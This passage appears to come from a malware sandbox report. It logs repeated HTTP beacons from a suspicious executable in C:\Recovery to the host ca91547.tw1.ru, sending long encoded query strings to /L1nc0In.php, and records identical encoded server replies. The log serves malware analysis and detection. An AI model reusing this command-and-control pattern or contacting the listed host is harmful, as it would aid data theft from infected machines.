Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:25.988720894 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49970	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:31.124542952 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:24:32.463556051 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49986	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:37.589167118 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:24:38.943627119 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50002	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:44.075038910 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:45.462353945 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50017	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:50.592355967 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:51.935606956 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50030	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:57.074853897 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:58.428715944 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:58 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50031	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:03.557894945 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:25:04.904489040 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50032	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:10.041970015 CET	2126	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMk [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:25:11.384875059 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50033	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:25:16.515415907 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:25:17.863615990 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:25:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50034	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
